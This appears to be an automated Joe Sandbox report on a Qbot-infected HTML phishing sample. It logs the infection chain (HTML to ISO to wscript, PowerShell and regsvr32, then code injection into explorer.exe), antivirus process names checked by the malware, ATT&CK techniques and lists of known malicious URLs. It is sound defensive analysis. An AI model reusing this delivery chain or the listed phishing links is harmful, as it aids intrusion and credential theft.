          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032EA202 GetSystemTimeAsFileTime,29_2_032EA202
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032EDE84 GetVersionExA,GetCurrentProcessId,29_2_032EDE84
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
          Source: regsvr32.exe, 0000001B.00000003.499916035.0000000004D6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Qbot
          Source: Yara matchFile source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.regsvr32.exe.31b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Qbot
          Source: Yara matchFile source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.regsvr32.exe.31b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts111
          Scripting          		1
          DLL Side-Loading          		211
          Process Injection          		3
          Masquerading          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Screen Capture          		Exfiltration Over Other Network Medium11
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts3
          Native API          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          Input Capture          		21
          Security Software Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          PowerShell          		Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager1
          Process Discovery          		SMB/Windows Admin Shares1
          Input Capture          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)211
          Process Injection          		NTDS31
          Virtualization/Sandbox Evasion          		Distributed Component Object Model1
          Archive Collected Data          		Scheduled Transfer4
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script111
          Scripting          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync15
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 704342 Sample: Calculation#8785(Sep16).html Startdate: 16/09/2022 Architecture: WINDOWS Score: 84 56 Malicious sample detected (through community Yara rule) 2->56 58 Phishing site detected (based on favicon image match) 2->58 60 Yara detected Qbot 2->60 10 chrome.exe 18 8 2->10         started        13 chrome.exe 2->13         started        process3 dnsIp4 52 192.168.2.1 unknown unknown 10->52 54 239.255.255.250 unknown Reserved 10->54 15 unarchiver.exe 3 5 10->15         started        18 chrome.exe 10->18         started        process5 dnsIp6 70 Uses 7zip to decompress a password protected archive 15->70 21 wscript.exe 1 15->21         started        24 cmd.exe 1 15->24         started        26 7za.exe 2 15->26         started        46 clients.l.google.com 142.250.180.174, 443, 49727 GOOGLEUS United States 18->46 48 www.google.com 142.250.184.100, 443, 49732, 49799 GOOGLEUS United States 18->48 50 4 other IPs or domains 18->50 signatures7 process8 file9 62 Wscript starts Powershell (via cmd or directly) 21->62 29 cmd.exe 1 21->29         started        31 powershell.exe 30 24->31         started        33 conhost.exe 24->33         started        44 C:\Users\user\...\Calculation#8785.iso, ISO 26->44 dropped 35 conhost.exe 26->35         started        signatures10 process11 process12 37 regsvr32.exe 29->37         started        40 conhost.exe 29->40         started        signatures13 64 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 37->64 66 Injects code into the Windows Explorer (explorer.exe) 37->66 68 Maps a DLL or memory area into another process 37->68 42 explorer.exe 37->42         started        process14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          27.2.regsvr32.exe.31b0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          29.0.explorer.exe.32e0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          29.2.explorer.exe.32e0000.0.unpack100%AviraHEUR/AGEN.1234562Download File

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          accounts.google.com
          		142.250.184.45
          		truefalse
            		high
            www.google.com
            		142.250.184.100
            		truefalse
              		high
              clients.l.google.com
              		142.250.180.174
              		truefalse
                		high
                use.typekit.net
                		unknown
                		unknownfalse
                  		high
                  clients2.google.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                      		high
                      https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                        		high
                        file:///C:/Users/user/Desktop/Calculation%238785(Sep16).htmltrue
                          		low

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://use.typekit.net/af/4b3e87/000000000000000000017706/27/a?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                            		high
                            https://use.typekit.net/af/74ffb1/000000000000000000017702/27/d?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                              		high
                              https://use.typekit.net/af/a2527e/000000000000000000017704/27/l?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                		high
                                https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                  		high
                                  https://use.typekit.net/af/40207f/0000000000000000000176ff/27/a?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                    		high
                                    https://use.typekit.net/af/4b3e87/000000000000000000017706/27/d?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                      		high
                                      https://use.typekit.net/af/74ffb1/000000000000000000017702/27/l?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                        		high
                                        https://use.typekit.net/af/a2527e/000000000000000000017704/27/a?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                          		high
                                          https://github.com/twbs/bootstrap/blob/main/LICENSE)Calculation#8785(Sep16).htmlfalse
                                            		high
                                            https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                              		high
                                              https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                                		high
                                                https://use.typekit.net/af/cb695f/000000000000000000017701/27/a?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                                  		high
                                                  https://getbootstrap.com/)Calculation#8785(Sep16).htmlfalse
                                                    		high
                                                    https://use.typekit.net/af/4b3e87/000000000000000000017706/27/l?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                                      		high
                                                      https://use.typekit.net/af/cb695f/000000000000000000017701/27/l?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                                        		high
                                                        https://use.typekit.net/af/74ffb1/000000000000000000017702/27/a?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                                          		high
                                                          https://use.typekit.net/af/40207f/0000000000000000000176ff/27/l?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                                            		high
                                                            https://use.typekit.net/af/a2527e/000000000000000000017704/27/d?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                                              		high
                                                              https://use.typekit.net/af/eaf09c/000000000000000000017703/27/a?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                                                		high
                                                                https://use.typekit.net/af/eaf09c/000000000000000000017703/27/l?primer=0635fba006f1437d962ae878ad04aCalculation#8785(Sep16).htmlfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  142.250.184.45
                                                                  		accounts.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  239.255.255.250
                                                                  		unknownReserved
                                                                  		unknownunknownfalse
                                                                  142.250.184.100
                                                                  		www.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  142.250.180.174
                                                                  		clients.l.google.comUnited States
                                                                  		15169GOOGLEUSfalse

                                                                  Private

                                                                  IP
                                                                  192.168.2.1
                                                                  127.0.0.1

                                                                  General Information

                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                  Analysis ID:704342
                                                                  Start date and time:2022-09-16 19:13:10 +02:00
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 9m 48s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:Calculation#8785(Sep16).html
                                                                  Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:34
                                                                  Number of new started drivers analysed:3
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal84.phis.troj.evad.winHTML@48/9@5/6
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HDC Information:
                                                                  • Successful, ratio: 25% (good quality ratio 23.5%)
                                                                  • Quality average: 76.2%
                                                                  • Quality standard deviation: 27.1%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 58
                                                                  • Number of non-executed functions: 22
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .html

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, vhdmp.sys, RuntimeBroker.exe, backgroundTaskHost.exe, fsdepends.sys, cdfs.sys, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.50.105.163, 142.250.184.99, 34.104.35.123, 173.222.108.232, 173.222.108.216, 20.223.24.244, 142.250.180.131
                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, edgedl.me.gvt1.com, use-stls.adobe.com.edgesuite.net, e16604.g.akamaiedge.net, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, a1988.dscg1.akamai.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  19:15:08API Interceptor31x Sleep call for process: powershell.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  239.255.255.250http://incentof.space/vYFvS.php?32=1o4163248544467e5_1tw4.g0mpwxj.A01j1r017ai1wah7st_5y2372.02mznMG1uOTIyaGRuY2xj0l39LZGet hashmaliciousBrowse
                                                                    http://adam_goad@baylor.edu.purbodigonta.com/4NI0-QLOV4A-YEO0/aHR0cDovL2FkYW1fZ29hZEBiYXlsb3IuZWR1LmVrYXR0b3Jwcm90aWRpbi5jb20vYWRhbV9nb2FkQGJheWxvci5lZHUGet hashmaliciousBrowse
                                                                      http://bizoutreachsolution.comGet hashmaliciousBrowse
                                                                        http://h.parrable.comGet hashmaliciousBrowse
                                                                          #U266b Voicemail sound recording from +44 (0) 7957 307853.htmGet hashmaliciousBrowse
                                                                            https://paper.li/SfOmln2pvbgIc34hjWHdx/story/ap-continental-ng9MjVenkNGwwLotndsmuGet hashmaliciousBrowse
                                                                              https://continental-re.w3spaces.com/Get hashmaliciousBrowse
                                                                                http://oqihfnlswl.rkjfakfwms.solarseg.com/serrutem/c2VycnV0ZW1AdWhuai5vcmc=Get hashmaliciousBrowse
                                                                                  https://csenergieqcca-my.sharepoint.com/:o:/g/personal/lilapointe_cssenergie_gouv_qc_ca/EkAscqyuNbxLn-OiQMlM7ZoBDqm9wfaOvPuhbmDYYll7Vw?e=g9yPadGet hashmaliciousBrowse
                                                                                    https://sharefile.tloflow.com/common/loginGet hashmaliciousBrowse
                                                                                      http://email.mg.chemist2u.com.au/c/eJx9jTsOwyAQRE8DJWJ3WWwKijiO70Ew_kj-RDZucvrgC0QajaZ4mpc8WEuEjmwte1_xUBHK2aNG1A4sAFtdK1DU1NCaZ2M659i9GmH0Oqo4pXU-M14q7qsKl5y8jhGq0GuOHIHfJkCqmIbe2gHNG1munrUxDgjk4qecP4IeAruSHLfyo76hbHWXoC4Jas8jnHkf5-Ic05aOsIS8hC3P8dbKw_8HfmeVQ3oGet hashmaliciousBrowse
                                                                                        https://kwtwcss.org/wp-admin/includes/c/ali1/ali/login.php?email=cen.liu@schulergroup.comGet hashmaliciousBrowse
                                                                                          https://protect-eu.mimecast.com/s/iyG9C6X7QtyNANJspBNtt?domain=email.mg.chemist2u.com.au%5DGet hashmaliciousBrowse
                                                                                            http://email.mg.chemist2u.com.au/c/eJyFjUEOgyAURE8DSwKf_yEuWFiN9xDEaqJoBNOkpy-eoMlkMouXedEpY7SGBizyyVmarQa-OpAAslFGKUINQgnb9QNS33aypZcaiKHc3yIscV9zgVuEYxfjzRdnwkw-IiEYwNmSkd56jB4mwmDR8t2RRGyUVnxzSykn0y2DoaaEVH_Ed6xbPMX0EJnuc7pLOVJVbmPK0_FJ8RyvkuKVHy-_3B_iB-HBRKwGet hashmaliciousBrowse
                                                                                              https://protect-eu.mimecast.com/s/iyG9C6X7QtyNANJspBNtt?domain=email.mg.chemist2u.com.au%5DGet hashmaliciousBrowse
                                                                                                https://@7400a723111a5b386748daf7e23c100d.enovin.ro#YXJ1cC5tQGFkY2IuY29tGet hashmaliciousBrowse
                                                                                                  http://slickfluide.comGet hashmaliciousBrowse
                                                                                                    http://maxcdn.bootstrapcdn.orgGet hashmaliciousBrowse
                                                                                                      http://extanalyticspro.s3-website.us-east-2.amazonaws.comGet hashmaliciousBrowse
                                                                                                        https://h.parrable.com/Get hashmaliciousBrowse

                                                                                                          Domains

                                                                                                          No context

                                                                                                          ASNs

                                                                                                          No context

                                                                                                          JA3 Fingerprints

                                                                                                          No context

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):58152
                                                                                                          Entropy (8bit):5.034192745399562
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:SozV3CNBQkj2Lh4iUxpaVXflJnuvtqdZ56/zFzgVx1Uzj7vioBnNe7oZtUtQOdBi:HzV3CNBQkj2LqiUpaVXflJnuvtqdZ565
                                                                                                          MD5:3C02450B486E89D37CF9FC3D94B41DDA
                                                                                                          SHA1:E518483BA22EE1889ACD4ABF3A8DB69E1F8F5192
                                                                                                          SHA-256:3DFBB41798333B477BEF3EF266F2C1247ED019E050F93E2BAEB1072AB7060D11
                                                                                                          SHA-512:1946964DFC085F233F6EC1B3198F27812D54EFBC29D6243E5AA3D49E1691391CD0413FED04E01136838A4BD0A989FEE1B3536D9A368A9BCE996B02711D737191
                                                                                                          Malicious:false
                                                                                                          Preview:PSMODULECACHE.=...Dn.*...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-SmbBandwidthLimit........Get-SmbClientConfiguration........Get-SmbSession........Get-Sm

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21684
                                                                                                          Entropy (8bit):5.598418726405245
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:VtCFy02osDx0N4Hz4upSBxnzjulrI0iJ9ghSJ3uyV1j4zmtGBy9m1lz6SZUYA:qAxAUl4xzClrxhcueTkMSnA
                                                                                                          MD5:94C989D59CD823ABF3E21289A026392A
                                                                                                          SHA1:2F31E2D2078C5BFC8FDF24327AAA5F333A12ECC0
                                                                                                          SHA-256:458F1DF933ADF66B2E3070F2A667701F64A5F1DB1D2690FDC2ACA1F29D6E7EBD
                                                                                                          SHA-512:4D5F99145764DB65424C3251D1B9EF053A71AB8B24106B15657AAF359064337BE76A6FFD446F836CC5410554852CA52478322590249A39B851370A565A952E2F
                                                                                                          Malicious:false
